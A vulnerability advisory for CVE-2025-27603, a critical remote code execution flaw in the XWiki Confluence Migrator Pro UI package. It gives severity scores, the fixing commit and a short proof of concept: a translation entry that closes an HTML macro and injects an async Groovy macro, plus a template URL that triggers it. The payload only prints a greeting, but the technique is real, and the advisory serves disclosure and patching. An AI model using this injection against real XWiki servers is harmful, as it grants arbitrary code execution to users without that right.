CVE-2025-27603 – com.xwiki.confluencepro:application-confluence-migrator-pro-ui

Package

Manager: maven
Name: com.xwiki.confluencepro:application-confluence-migrator-pro-ui
Vulnerable Version: >=1.0 <1.2.0

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.00129 pctl0.33152

Details

com.xwiki.confluencepro:application-confluence-migrator-pro-ui Remote Code Execution via unescaped translations ### Impact A user that doesn't have programming rights can execute arbitrary code when creating a page using the Migration Page template. A possible attack vector is the following: * Create a page and add the following content: ``` confluencepro.job.question.advanced.input={{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}} ``` * Use the object editor to add an object of type `XWiki.TranslationDocumentClass` with scope `USER`. * Access an unexisting page using the `MigrationTemplate` ``` http://localhost:8080/xwiki/bin/edit/Page123?template=ConfluenceMigratorPro.Code.MigrationTemplate ``` It is expected that `{{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}}` will be present on the page, however, `hello from groovy` will be printed. ### Patches The issue will be fixed as part of v1.2. The fix was added with commit [35cef22](https://github.com/xwikisas/application-confluence-migrator-pro/commit/36cef2271bd429773698ca3a21e47b6d51d6377d) ### Workarounds There are no known workarounds besides upgrading. ### References No references.

Metadata

Created: 2025-03-07T16:07:50Z
Modified: 2025-03-07T19:16:50Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-6qvp-39mm-95v8/GHSA-6qvp-39mm-95v8.json
CWE IDs: ["CWE-95"]
Alternative ID: GHSA-6qvp-39mm-95v8
Finding: F184
Auto approve: 1